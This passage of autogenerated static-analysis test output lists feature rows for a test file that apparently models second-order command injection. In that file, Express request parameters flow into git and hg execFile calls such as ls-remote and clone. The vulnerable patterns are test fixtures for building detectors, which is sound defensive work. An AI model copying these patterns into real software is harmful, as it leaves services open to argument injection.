remote execFile git ls-remote remote execFile git fetch remote indirect git ls-remote remote myArgs req query args execFile git myArgs remote startsWith -- execFile git ls-remote remote HEAD execFile git ls-remote remote HEAD remote startsWith git@ execFile git ls-remote remote HEAD execFile git ls-remote remote HEAD execFile git req query args execFile git add req query args execFile git add req query remote concat otherargs execFile git ls-remote req query remote concat req query otherArgs execFile git add fpp concat req query notVulnerable execFile hg clone req query remote execFile hg whatever req query remote execFile hg req query args execFile hg clone -- req query remote | +| autogenerated/ShellCommandInjectionFromEnvironment/SecondOrderCommandInjection/second-order.js:46:3:46:10 | execFile | enclosingFunctionName | app.get#functionalargument | +| autogenerated/ShellCommandInjectionFromEnvironment/SecondOrderCommandInjection/second-order.js:46:3:46:10 | execFile | fileImports | child_process express | +| autogenerated/ShellCommandInjectionFromEnvironment/SecondOrderCommandInjection/second-order.js:46:3:46:51 | exceptional return of execFil ... emote]) | contextFunctionInterfaces | indirect(cmd, args) | +| autogenerated/ShellCommandInjectionFromEnvironment/SecondOrderCommandInjection/second-order.js:46:3:46:51 | exceptional return of execFil ... emote]) | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/SecondOrderCommandInjection/second-order.js:46:3:46:51 | exceptional return of execFil ... emote]) | enclosingFunctionBody | req res remote req query remote execFile git ls-remote remote execFile git fetch remote indirect git ls-remote remote myArgs req query args execFile git myArgs remote startsWith -- execFile git ls-remote remote HEAD execFile git ls-remote remote HEAD remote startsWith git@ execFile git ls-remote remote HEAD execFile git ls-remote remote HEAD execFile git req query args execFile git add req query args execFile git add req query remote concat otherargs execFile git ls-remote req query remote concat req query otherArgs execFile git add fpp concat req query notVulnerable execFile hg clone req query remote execFile hg whatever req query remote execFile hg req query args execFile hg clone -- req query remote | +| autogenerated/ShellCommandInjectionFromEnvironment/SecondOrderCommandInjection/second-order.js:46:3:46:51 | exceptional return of execFil ... emote]) | enclosingFunctionName | app.get#functionalargument | +| autogenerated/ShellCommandInjectionFromEnvironment/SecondOrderCommandInjection/second-order.js:46:3:46:51 | exceptional return of execFil ... emote]) | fileImports | child_process express | +| autogenerated/ShellCommandInjectionFromEnvironment/SecondOrderCommandInjection/second-order.js:46:3:46:51 | execFil ... emote]) | contextFunctionInterfaces | indirect(cmd, args) | +| autogenerated/ShellCommandInjectionFromEnvironment/SecondOrderCommandInjection/second-order.js:46:3:46:51 | execFil ... emote]) | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/ShellCommandInjectionFromEnvironment/SecondOrderCommandInjection/second-order.js:46:3:46:51 | execFil ... emote]) | enclosingFunctionBody | req res remote req query remote execFile git ls-remote remote execFile git fetch remote indirect git ls-remote remote myArgs req query args execFile git myArgs remote startsWith -- execFile git ls-remote remote HEAD execFile git ls-remote remote HEAD remote startsWith git@ execFile git ls-remote remote HEAD execFile git ls-remote remote HEAD execFile git req query args execFile git add req query args execFile git add req query remote concat otherargs execFile git ls-remote req query remote concat req query otherArgs execFile git add fpp concat req query notVulnerable execFile hg clone req query remote execFile hg whatever req query remote execFile hg req query args execFile hg clone -- req query remote | +| autogenerated/ShellCommandInjectionFromEnvironment/SecondOrderCommandInjection/second-order.js:46:3:46:51 | execFil ... emote]) | enclosingFunctionName | app.get#functionalargument | +| autogenerated/ShellCommandInjectionFromEnvironment/SecondOrderCommandInjection/second-order.js:46:3:46:51 | execFil ... emote]) | fileImports | child_process express | +| autogenerated/ShellCommandInjectionFromEnvironment/SecondOrderCommandInjection/second-order.js:46:12:46:15 | "hg" | CalleeFlexibleAccessPath | execFile | +| autogenerated/ShellCommandInjectionFromEnvironment/SecondOrderCommandInjection/second-order.js:46:12:46:15 | "hg" | InputArgumentIndex | 0 | +| autogenerated/ShellCommandInjectionFromEnvironment/SecondOrderCommandInjection/second-order.js:46:12:46:15 | "hg" | calleeImports | child_process | +| autogenerated/ShellCommandInjectionFromEnvironment/SecondOrderCommandInjection/second-order.js:46:12:46:15 | "hg" | contextFunctionInterfaces | indirect(cmd, args) | +| autogenerated/ShellCommandInjectionFromEnvironment/SecondOrderCommandInjection/second-order.js:46:12:46:15 | "hg" | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/ShellCommandInjectionFromEnvironment/SecondOrderCommandInjection/second-order.js:46:12:46:15 | "hg" | enclosingFunctionBody | req res remote req query remote execFile git ls-remote remote execFile git fetch remote indirect git ls-remote remote myArgs req query args execFile git myArgs remote startsWith -- execFile git ls-remote remote HEAD execFile git ls-remote remote HEAD remote startsWith git@ execFile git ls-remote remote HEAD execFile git ls-remote remote HEAD execFile git req query args execFile git add req query args execFile git add req query remote concat otherargs execFile git ls-remote req query remote concat req query otherArgs execFile git add fpp concat req query notVulnerable execFile hg clone req query remote execFile hg whatever req query remote execFile hg req query args execFile hg clone -- req query remote | +| autogenerated/ShellCommandInjectionFromEnvironment/SecondOrderCommandInjection/second-order.js:46:12:46:15 | "hg" | enclosingFunctionName | app.get#functionalargument | +| autogenerated/ShellCommandInjectionFromEnvironment/SecondOrderCommandInjection/second-order.js:46:12:46:15 | "hg" | fileImports | child_process express | +| autogenerated/ShellCommandInjectionFromEnvironment/SecondOrderCommandInjection/second-order.js:46:18:46:50 | ["clone ... remote] | CalleeFlexibleAccessPath | execFile | +| autogenerated/ShellCommandInjectionFromEnvironment/SecondOrderCommandInjection/second-order.js:46:18:46:50 | ["clone ... remote] | InputArgumentIndex | 1 | +| autogenerated/ShellCommandInjectionFromEnvironment/SecondOrderCommandInjection/second-order.js:46:18:46:50 | ["clone ... remote] | calleeImports | child_process | +| autogenerated/ShellCommandInjectionFromEnvironment/SecondOrderCommandInjection/second-order.js:46:18:46:50 | ["clone ... remote] | contextFunctionInterfaces | indirect(cmd, args) | +| autogenerated/ShellCommandInjectionFromEnvironment/SecondOrderCommandInjection/second-order.js:46:18:46:50 | ["clone ... remote] | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/ShellCommandInjectionFromEnvironment/SecondOrderCommandInjection/second-order.js:46:18:46:50 | ["clone ... remote] | enclosingFunctionBody | req res remote req query remote execFile git ls-remote remote execFile git fetch remote indirect git ls-remote remote myArgs req query args execFile git myArgs remote startsWith -- execFile git ls-remote remote HEAD execFile git ls-remote remote HEAD remote startsWith git@ execFile git ls-remote remote HEAD execFile git ls-remote remote HEAD execFile git req query args execFile git add req query args execFile git add req query remote concat otherargs execFile git ls-remote req query remote concat req query otherArgs execFile git add fpp concat req query notVulnerable execFile hg clone req query remote execFile hg whatever req query remote execFile hg req query args execFile hg clone -- req query remote | +| autogenerated/ShellCommandInjectionFromEnvironment/SecondOrderCommandInjection/second-order.js:46:18:46:50 | ["clone ... remote] | enclosingFunctionName | app.get#functionalargument | +| autogenerated/ShellCommandInjectionFromEnvironment/SecondOrderCommandInjection/second-order.js:46:18:46:50 | ["clone ... remote] | fileImports | child_process express | +| autogenerated/ShellCommandInjectionFromEnvironment/SecondOrderCommandInjection/second-order.js:46:19:46:25 | "clone" | contextFunctionInterfaces | indirect(cmd, args) | +| autogenerated/ShellCommandInjectionFromEnvironment/SecondOrderCommandInjection/second-order.js:46:19:46:25 | "clone" | contextFunctionInterfaces | indirect(cmd, args) | +| autogenerated/ShellCommandInjectionFromEnvironment/SecondOrderCommandInjection/second-order.js:46:19:46:25 | "clone" | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/SecondOrderCommandInjection/second-order.js:46:19:46:25 | "clone" | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/ShellCommandInjectionFromEnvironment/SecondOrderCommandInjection/second-order.js:46:19:46:25 | "clone" | enclosingFunctionBody | req res remote req query remote execFile git ls-remote remote execFile git fetch remote indirect git ls-remote remote myArgs req query args execFile git myArgs remote startsWith -- execFile git ls-remote remote HEAD execFile git ls-remote remote HEAD remote startsWith git@ execFile git ls-remote remote HEAD execFile git ls-remote remote HEAD execFile git req query args execFile git add req query args execFile git add req query remote concat otherargs execFile git ls-remote req query remote concat req query otherArgs execFile git add fpp concat req query notVulnerable execFile hg clone req query remote execFile hg whatever req query remote execFile hg req query args execFile hg clone -- req query remote | +| autogenerated/ShellCommandInjectionFromEnvironment/SecondOrderCommandInjection/second-order.js:46:19:46:25 | "clone" | enclosingFunctionBody | req res remote req query remote execFile git ls-remote remote execFile git fetch remote indirect git ls-remote remote myArgs req query args execFile git myArgs remote startsWith -- execFile git ls-remote remote HEAD execFile git ls-remote remote HEAD remote startsWith git@ execFile git ls-remote remote HEAD execFile git ls-remote remote HEAD execFile git req query args execFile git add req query args execFile git add req query remote concat otherargs execFile git ls-remote req query remote concat req query otherArgs execFile git add fpp concat req query notVulnerable execFile hg clone req query remote execFile hg whatever req query remote execFile hg req query args execFile hg clone -- req query remote | +| autogenerated/ShellCommandInjectionFromEnvironment/SecondOrderCommandInjection/second-order.js:46:19:46:25 | "clone" | enclosingFunctionName | app.get#functionalargument | +| autogenerated/ShellCommandInjectionFromEnvironment/SecondOrderCommandInjection/second-order.js:46:19:46:25 | "clone" | enclosingFunctionName | app.get#functionalargument | +| autogenerated/ShellCommandInjectionFromEnvironment/SecondOrderCommandInjection/second-order.js:46:19:46:25 | "clone" | fileImports | child_process express | +| autogenerated/ShellCommandInjectionFromEnvironment/SecondOrderCommandInjection/second-order.js:46:19:46:25 | "clone" | fileImports | child_process express | +| autogenerated/ShellCommandInjectionFromEnvironment/SecondOrderCommandInjection/second-order.js:46:28:46:31 | "--" | contextFunctionInterfaces | indirect(cmd, args) | +| autogenerated/ShellCommandInjectionFromEnvironment/SecondOrderCommandInjection/second-order.js:46:28:46:31 | "--" | contextFunctionInterfaces | indirect(cmd, args) | +| autogenerated/ShellCommandInjectionFromEnvironment/SecondOrderCommandInjection/second-order.js:46:28:46:31 | "--" | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/SecondOrderCommandInjection/second-order.js:46:28:46:31 | "--" | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/ShellCommandInjectionFromEnvironment/SecondOrderCommandInjection/second-order.js:46:28:46:31 | "--" | enclosingFunctionBody | req res remote req query remote execFile git ls-remote remote execFile git fetch remote indirect git ls-remote remote myArgs req query args execFile git myArgs remote startsWith -- execFile git ls-remote remote HEAD execFile git ls-remote remote HEAD remote startsWith git@ execFile git ls-remote remote HEAD execFile git ls-remote remote HEAD execFile git req query args execFile git add req query args execFile git add req query remote concat otherargs execFile git ls-remote req query remote concat req query otherArgs execFile git add fpp concat req query notVulnerable execFile hg clone req query remote execFile hg whatever req query remote execFile hg req query args execFile hg clone -- req query remote | +| autogenerated/ShellCommandInjectionFromEnvironment/SecondOrderCommandInjection/second-order.js:46:28:46:31 | "--" | enclosingFunctionBody | req res remote req query remote execFile git ls-remote remote execFile git fetch remote indirect git ls-remote remote myArgs req query args execFile git myArgs remote startsWith -- execFile git ls-remote remote HEAD execFile git ls-remote remote HEAD remote startsWith git@ execFile git ls-remote remote HEAD execFile git ls-remote remote HEAD execFile git req query args execFile git add req query args execFile git add req query remote concat otherargs execFile git ls-remote req query remote concat req query otherArgs execFile git add fpp concat req query notVulnerable execFile hg clone req query remote execFile hg whatever req query remote execFile hg req query args execFile hg clone -- req query remote | +| autogenerated/ShellCommandInjectionFromEnvironment/SecondOrderCommandInjection/second-order.js:46:28:46:31 | "--" | enclosingFunctionName | app.get#functionalargument | +| autogenerated/ShellCommandInjectionFromEnvironment/SecondOrderCommandInjection/second-order.js:46:28:46:31 | "--" | enclosingFunctionName | app.get#functionalargument | +| autogenerated/ShellCommandInjectionFromEnvironment/SecondOrderCommandInjection/second-order.js:46:28:46:31 | "--" | fileImports | child_process express | +| autogenerated/ShellCommandInjectionFromEnvironment/SecondOrderCommandInjection/second-order.js:46:28:46:31 | "--" | fileImports | child_process express | +| autogenerated/ShellCommandInjectionFromEnvironment/SecondOrderCommandInjection/second-order.js:46:34:46:36 | req | contextFunctionInterfaces | indirect(cmd, args) | +| autogenerated/ShellCommandInjectionFromEnvironment/SecondOrderCommandInjection/second-order.js:46:34:46:36 | req | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/ShellCommandInjectionFromEnvironment/SecondOrderCommandInjection/second-order.js:46:34:46:36 | req | enclosingFunctionBody | req res remote req query remote execFile git ls-remote remote execFile git fetch remote indirect git ls-remote remote myArgs req query args execFile git myArgs remote startsWith -- execFile git ls-remote remote HEAD execFile git ls-remote remote HEAD remote startsWith git@ execFile git ls-remote remote HEAD execFile git ls-remote remote HEAD execFile git req query args execFile git add req query args execFile git add req query remote concat otherargs execFile git ls-remote req query remote concat req query otherArgs execFile git add fpp concat req query notVulnerable execFile hg clone req query remote execFile hg whatever req query remote execFile hg req query args execFile hg clone -- req query remote | +| autogenerated/ShellCommandInjectionFromEnvironment/SecondOrderCommandInjection/second-order.js:46:34:46:36 | req | enclosingFunctionName | app.get#functionalargument | +| autogenerated/ShellCommandInjectionFromEnvironment/SecondOrderCommandInjection/second-order.js:46:34:46:36 | req | fileImports | child_process express | +| autogenerated/ShellCommandInjectionFromEnvironment/SecondOrderCommandInjection/second-order.js:46:34:46:42 | req.query | contextFunctionInterfaces | indirect(cmd, args) | +| autogenerated/ShellCommandInjectionFromEnvironment/SecondOrderCommandInjection/second-order.js:46:34:46:42 | req.query | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/ShellCommandInjectionFromEnvironment/SecondOrderCommandInjection/second-order.js:46:34:46:42 | req.query | enclosingFunctionBody | req res remote req query remote execFile git ls-remote remote execFile git fetch remote indirect git ls-remote remote myArgs req query args execFile git myArgs remote startsWith -- execFile git ls-remote remote HEAD execFile git ls-remote remote HEAD remote startsWith git@ execFile git ls-remote remote HEAD execFile git ls-remote remote HEAD execFile git req query args execFile git add req query args execFile git add req query remote concat otherargs execFile git ls-remote req query remote concat req query otherArgs execFile git add fpp concat req query notVulnerable execFile hg clone req query remote execFile hg whatever req query remote execFile hg req query args execFile hg clone -- req query remote | +| autogenerated/ShellCommandInjectionFromEnvironment/SecondOrderCommandInjection/second-order.js:46:34:46:42 | req.query | enclosingFunctionName | app.get#functionalargument | +| autogenerated/ShellCommandInjectionFromEnvironment/SecondOrderCommandInjection/second-order.js:46:34:46:42 | req.query | fileImports | child_process express | +| autogenerated/ShellCommandInjectionFromEnvironment/SecondOrderCommandInjection/second-order.js:46:34:46:49 | req.query.remote | contextFunctionInterfaces | indirect(cmd, args) | +| autogenerated/ShellCommandInjectionFromEnvironment/SecondOrderCommandInjection/second-order.js:46:34:46:49 | req.query.remote | contextFunctionInterfaces | indirect(cmd, args) | +| autogenerated/ShellCommandInjectionFromEnvironment/SecondOrderCommandInjection/second-order.js:46:34:46:49 | req.query.remote | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/SecondOrderCommandInjection/second-order.js:46:34:46:49 | req.query.remote | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/ShellCommandInjectionFromEnvironment/SecondOrderCommandInjection/second-order.js:46:34:46:49 | req.query.remote | enclosingFunctionBody | req res remote req query remote execFile git ls-remote remote execFile git fetch remote indirect git ls-remote remote myArgs req query args execFile git myArgs remote startsWith -- execFile git ls-remote remote HEAD execFile git ls-remote remote HEAD remote startsWith git@ execFile git ls-remote remote HEAD execFile git ls-remote remote HEAD execFile git req query args execFile git add req query args execFile git add req query remote concat otherargs execFile git ls-remote req query remote concat req query otherArgs execFile git add fpp concat req query notVulnerable execFile hg clone req query remote execFile hg whatever req query remote execFile hg req query args execFile hg clone -- req query remote | +| autogenerated/ShellCommandInjectionFromEnvironment/SecondOrderCommandInjection/second-order.js:46:34:46:49 | req.query.remote | enclosingFunctionBody | req res remote req query remote execFile git ls-remote remote execFile git fetch remote indirect git ls-remote remote myArgs req query args execFile git myArgs remote startsWith -- execFile git ls-remote remote HEAD execFile git ls-remote remote HEAD remote startsWith git@ execFile git ls-remote remote HEAD execFile git ls-remote remote HEAD execFile git req query args execFile git add req query args execFile git add req query remote concat otherargs execFile git ls-remote req query remote concat req query otherArgs execFile git add fpp concat req query notVulnerable execFile hg clone req query remote execFile hg whatever req query remote execFile hg req query args execFile hg clone -- req query remote | +| autogenerated/ShellCommandInjectionFromEnvironment/SecondOrderCommandInjection/second-order.js:46:34:46:49 | req.query.remote | enclosingFunctionName | app.get#functionalargument | +| autogenerated/ShellCommandInjectionFromEnvironment/SecondOrderCommandInjection/second-order.js:46:34:46:49 | req.query.remote | enclosingFunctionName | app.get#functionalargument | +| autogenerated/ShellCommandInjectionFromEnvironment/SecondOrderCommandInjection/second-order.js:46:34:46:49 | req.query.remote | fileImports | child_process express | +| autogenerated/ShellCommandInjectionFromEnvironment/SecondOrderCommandInjection/second-order.js:46:34:46:49 | req.query.remote | fileImports | child_process express | +| autogenerated/ShellCommandInjectionFromEnvironment/SecondOrderCommandInjection/second-order.js:46:38:46:42 | query | contextFunctionInterfaces | indirect(cmd, args) | +| autogenerated/ShellCommandInjectionFromEnvironment/SecondOrderCommandInjection/second-order.js:46:38:46:42 | query | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/ShellCommandInjectionFromEnvironment/SecondOrderCommandInjection/second-order.js:46:38:46:42 | query | enclosingFunctionBody | req res remote req query remote execFile git ls-remote remote execFile git fetch remote indirect git ls-remote remote myArgs req query args execFile git myArgs remote startsWith -- execFile git ls-remote remote HEAD execFile git ls-remote remote HEAD remote startsWith git@ execFile git ls-remote remote HEAD execFile git ls-remote remote HEAD execFile git req query args execFile git add req query args execFile git add req query remote concat otherargs execFile git ls-remote req query remote concat req query otherArgs execFile git add fpp concat req query notVulnerable execFile hg clone req query remote execFile hg whatever req query remote execFile hg req query args execFile hg clone -- req query remote | +| autogenerated/ShellCommandInjectionFromEnvironment/SecondOrderCommandInjection/second-order.js:46:38:46:42 | query | enclosingFunctionName | app.get#functionalargument | +| autogenerated/ShellCommandInjectionFromEnvironment/SecondOrderCommandInjection/second-order.js:46:38:46:42 | query | fileImports | child_process express | +| autogenerated/ShellCommandInjectionFromEnvironment/SecondOrderCommandInjection/second-order.js:46:44:46:49 | remote | contextFunctionInterfaces | indirect(cmd, args) | +| autogenerated/ShellCommandInjectionFromEnvironment/SecondOrderCommandInjection/second-order.js:46:44:46:49 | remote | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/ShellCommandInjectionFromEnvironment/SecondOrderCommandInjection/second-order.js:46:44:46:49 | remote | enclosingFunctionBody | req res remote req query remote execFile git ls-remote remote execFile git fetch remote indirect git ls-remote remote myArgs req query args execFile git myArgs remote startsWith -- execFile git ls-remote remote HEAD execFile git ls-remote remote HEAD remote startsWith git@ execFile git ls-remote remote HEAD execFile git ls-remote remote HEAD execFile git req query args execFile git add req query args execFile git add req query remote concat otherargs execFile git ls-remote req query remote concat req query otherArgs execFile git add fpp concat req query notVulnerable execFile hg clone req query remote execFile hg whatever req query remote execFile hg req query args execFile hg clone -- req query remote | +| autogenerated/ShellCommandInjectionFromEnvironment/SecondOrderCommandInjection/second-order.js:46:44:46:49 | remote | enclosingFunctionName | app.get#functionalargument | +| autogenerated/ShellCommandInjectionFromEnvironment/SecondOrderCommandInjection/second-order.js:46:44:46:49 | remote | fileImports | child_process express | +| autogenerated/ShellCommandInjectionFromEnvironment/SecondOrderCommandInjection/second-order.js:49:1:49:0 | execFile | contextFunctionInterfaces | indirect(cmd, args) | +| autogenerated/ShellCommandInjectionFromEnvironment/SecondOrderCommandInjection/second-order.js:49:1:49:0 | execFile | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/SecondOrderCommandInjection/second-order.js:49:1:49:0 | execFile | enclosingFunctionBody | cmd args execFile cmd args | +| autogenerated/ShellCommandInjectionFromEnvironment/SecondOrderCommandInjection/second-order.js:49:1:49:0 | execFile | enclosingFunctionName | indirect | +| autogenerated/ShellCommandInjectionFromEnvironment/SecondOrderCommandInjection/second-order.js:49:1:49:0 | execFile | fileImports | child_process express | +| autogenerated/ShellCommandInjectionFromEnvironment/SecondOrderCommandInjection/second-order.js:49:1:49:0 | this | contextFunctionInterfaces | indirect(cmd, args) | +| autogenerated/ShellCommandInjectionFromEnvironment/SecondOrderCommandInjection/second-order.js:49:1:49:0 | this | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/SecondOrderCommandInjection/second-order.js:49:1:49:0 | this | enclosingFunctionBody | cmd args execFile cmd args | +| autogenerated/ShellCommandInjectionFromEnvironment/SecondOrderCommandInjection/second-order.js:49:1:49:0 | this | enclosingFunctionName | indirect | +| autogenerated/ShellCommandInjectionFromEnvironment/SecondOrderCommandInjection/second-order.js:49:1:49:0 | this | fileImports | child_process express | +| autogenerated/ShellCommandInjectionFromEnvironment/SecondOrderCommandInjection/second-order.js:49:1:51:1 | 'arguments' object of function indirect | contextFunctionInterfaces | indirect(cmd, args) | +| autogenerated/ShellCommandInjectionFromEnvironment/SecondOrderCommandInjection/second-order.js:49:1:51:1 | 'arguments' object of function indirect | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/SecondOrderCommandInjection/second-order.js:49:1:51:1 | 'arguments' object of function indirect | enclosingFunctionBody | cmd args execFile cmd args | +| autogenerated/ShellCommandInjectionFromEnvironment/SecondOrderCommandInjection/second-order.js:49:1:51:1 | 'arguments' object of function indirect | enclosingFunctionName | indirect | +| autogenerated/ShellCommandInjectionFromEnvironment/SecondOrderCommandInjection/second-order.js:49:1:51:1 | 'arguments' object of function indirect | fileImports | child_process express | +| autogenerated/ShellCommandInjectionFromEnvironment/SecondOrderCommandInjection/second-order.js:49:1:51:1 | exceptional return of function indirect | contextFunctionInterfaces | indirect(cmd, args) | +| autogenerated/ShellCommandInjectionFromEnvironment/SecondOrderCommandInjection/second-order.js:49:1:51:1 | exceptional return of function indirect | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/SecondOrderCommandInjection/second-order.js:49:1:51:1 | exceptional return of function indirect | enclosingFunctionBody | cmd args execFile cmd args | +| autogenerated/ShellCommandInjectionFromEnvironment/SecondOrderCommandInjection/second-order.js:49:1:51:1 | exceptional return of function indirect | enclosingFunctionName | indirect | +| autogenerated/ShellCommandInjectionFromEnvironment/SecondOrderCommandInjection/second-order.js:49:1:51:1 | exceptional return of function indirect | fileImports | child_process express | +| autogenerated/ShellCommandInjectionFromEnvironment/SecondOrderCommandInjection/second-order.js:49:1:51:1 | functio ... here\\n} | contextFunctionInterfaces | indirect(cmd, args) | +| autogenerated/ShellCommandInjectionFromEnvironment/SecondOrderCommandInjection/second-order.js:49:1:51:1 | functio ... here\\n} | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/SecondOrderCommandInjection/second-order.js:49:1:51:1 | functio ... here\\n} | fileImports | child_process express | +| autogenerated/ShellCommandInjectionFromEnvironment/SecondOrderCommandInjection/second-order.js:49:1:51:1 | return of function indirect | contextFunctionInterfaces | indirect(cmd, args) | +| autogenerated/ShellCommandInjectionFromEnvironment/SecondOrderCommandInjection/second-order.js:49:1:51:1 | return of function indirect | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/SecondOrderCommandInjection/second-order.js:49:1:51:1 | return of function indirect | enclosingFunctionBody | cmd args execFile cmd args | +| autogenerated/ShellCommandInjectionFromEnvironment/SecondOrderCommandInjection/second-order.js:49:1:51:1 | return of function indirect | enclosingFunctionName | indirect | +| autogenerated/ShellCommandInjectionFromEnvironment/SecondOrderCommandInjection/second-order.js:49:1:51:1 | return of function indirect | fileImports | child_process express | +| autogenerated/ShellCommandInjectionFromEnvironment/SecondOrderCommandInjection/second-order.js:49:10:49:17 | indirect | contextFunctionInterfaces | indirect(cmd, args) | +| autogenerated/ShellCommandInjectionFromEnvironment/SecondOrderCommandInjection/second-order.js:49:10:49:17 | indirect | contextFunctionInterfaces | indirect(cmd, args) | +| autogenerated/ShellCommandInjectionFromEnvironment/SecondOrderCommandInjection/second-order.js:49:10:49:17 | indirect | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/SecondOrderCommandInjection/second-order.js:49:10:49:17 | indirect | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/SecondOrderCommandInjection/second-order.js:49:10:49:17 | indirect | contextSurroundingFunctionParameters | (cmd, args) | +| autogenerated/ShellCommandInjectionFromEnvironment/SecondOrderCommandInjection/second-order.js:49:10:49:17 | indirect | fileImports | child_process express | +| autogenerated/ShellCommandInjectionFromEnvironment/SecondOrderCommandInjection/second-order.js:49:10:49:17 | indirect | fileImports | child_process express | +| autogenerated/ShellCommandInjectionFromEnvironment/SecondOrderCommandInjection/second-order.js:49:19:49:21 | cmd | contextFunctionInterfaces | indirect(cmd, args) | +| autogenerated/ShellCommandInjectionFromEnvironment/SecondOrderCommandInjection/second-order.js:49:19:49:21 | cmd | contextFunctionInterfaces | indirect(cmd, args) | +| autogenerated/ShellCommandInjectionFromEnvironment/SecondOrderCommandInjection/second-order.js:49:19:49:21 | cmd | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/SecondOrderCommandInjection/second-order.js:49:19:49:21 | cmd | contextSurroundingFunctionParameters | (cmd, args) | +| autogenerated/ShellCommandInjectionFromEnvironment/SecondOrderCommandInjection/second-order.js:49:19:49:21 | cmd | enclosingFunctionBody | cmd args execFile cmd args | +| autogenerated/ShellCommandInjectionFromEnvironment/SecondOrderCommandInjection/second-order.js:49:19:49:21 | cmd | enclosingFunctionBody | cmd args execFile cmd args | +| autogenerated/ShellCommandInjectionFromEnvironment/SecondOrderCommandInjection/second-order.js:49:19:49:21 | cmd | enclosingFunctionName | indirect | +| autogenerated/ShellCommandInjectionFromEnvironment/SecondOrderCommandInjection/second-order.js:49:19:49:21 | cmd | enclosingFunctionName | indirect | +| autogenerated/ShellCommandInjectionFromEnvironment/SecondOrderCommandInjection/second-order.js:49:19:49:21 | cmd | fileImports | child_process express | +| autogenerated/ShellCommandInjectionFromEnvironment/SecondOrderCommandInjection/second-order.js:49:19:49:21 | cmd | fileImports | child_process express | +| autogenerated/ShellCommandInjectionFromEnvironment/SecondOrderCommandInjection/second-order.js:49:24:49:27 | args | contextFunctionInterfaces | indirect(cmd, args) | +| autogenerated/ShellCommandInjectionFromEnvironment/SecondOrderCommandInjection/second-order.js:49:24:49:27 | args | contextFunctionInterfaces | indirect(cmd, args) | +| autogenerated/ShellCommandInjectionFromEnvironment/SecondOrderCommandInjection/second-order.js:49:24:49:27 | args | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/SecondOrderCommandInjection/second-order.js:49:24:49:27 | args | contextSurroundingFunctionParameters | (cmd, args) | +| autogenerated/ShellCommandInjectionFromEnvironment/SecondOrderCommandInjection/second-order.js:49:24:49:27 | args | enclosingFunctionBody | cmd args execFile cmd args | +| autogenerated/ShellCommandInjectionFromEnvironment/SecondOrderCommandInjection/second-order.js:49:24:49:27 | args | enclosingFunctionBody | cmd args execFile cmd args | +| autogenerated/ShellCommandInjectionFromEnvironment/SecondOrderCommandInjection/second-order.js:49:24:49:27 | args | enclosingFunctionName | indirect | +| autogenerated/ShellCommandInjectionFromEnvironment/SecondOrderCommandInjection/second-order.js:49:24:49:27 | args | enclosingFunctionName | indirect | +| autogenerated/ShellCommandInjectionFromEnvironment/SecondOrderCommandInjection/second-order.js:49:24:49:27 | args | fileImports | child_process express | +| autogenerated/ShellCommandInjectionFromEnvironment/SecondOrderCommandInjection/second-order.js:49:24:49:27 | args | fileImports | child_process express | +| autogenerated/ShellCommandInjectionFromEnvironment/SecondOrderCommandInjection/second-order.js:50:3:50:10 | execFile | contextFunctionInterfaces | indirect(cmd, args) | +| autogenerated/ShellCommandInjectionFromEnvironment/SecondOrderCommandInjection/second-order.js:50:3:50:10 | execFile | contextSurroundingFunctionParameters | (cmd, args) | +| autogenerated/ShellCommandInjectionFromEnvironment/SecondOrderCommandInjection/second-order.js:50:3:50:10 | execFile | enclosingFunctionBody | cmd args execFile cmd args | +| autogenerated/ShellCommandInjectionFromEnvironment/SecondOrderCommandInjection/second-order.js:50:3:50:10 | execFile | enclosingFunctionName | indirect | +| autogenerated/ShellCommandInjectionFromEnvironment/SecondOrderCommandInjection/second-order.js:50:3:50:10 | execFile | fileImports | child_process express | +| autogenerated/ShellCommandInjectionFromEnvironment/SecondOrderCommandInjection/second-order.js:50:3:50:21 | exceptional return of execFile(cmd, args) | contextFunctionInterfaces | indirect(cmd, args) | +| autogenerated/ShellCommandInjectionFromEnvironment/SecondOrderCommandInjection/second-order.js:50:3:50:21 | exceptional return of execFile(cmd, args) | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/SecondOrderCommandInjection/second-order.js:50:3:50:21 | exceptional return of execFile(cmd, args) | enclosingFunctionBody | cmd args execFile cmd args | +| autogenerated/ShellCommandInjectionFromEnvironment/SecondOrderCommandInjection/second-order.js:50:3:50:21 | exceptional return of execFile(cmd, args) | enclosingFunctionName | indirect | +| autogenerated/ShellCommandInjectionFromEnvironment/SecondOrderCommandInjection/second-order.js:50:3:50:21 | exceptional return of execFile(cmd, args) | fileImports | child_process express | +| autogenerated/ShellCommandInjectionFromEnvironment/SecondOrderCommandInjection/second-order.js:50:3:50:21 | execFile(cmd, args) | contextFunctionInterfaces | indirect(cmd, args) | +| autogenerated/ShellCommandInjectionFromEnvironment/SecondOrderCommandInjection/second-order.js:50:3:50:21 | execFile(cmd, args) | contextSurroundingFunctionParameters | (cmd, args) | +| autogenerated/ShellCommandInjectionFromEnvironment/SecondOrderCommandInjection/second-order.js:50:3:50:21 | execFile(cmd, args) | enclosingFunctionBody | cmd args execFile cmd args | +| 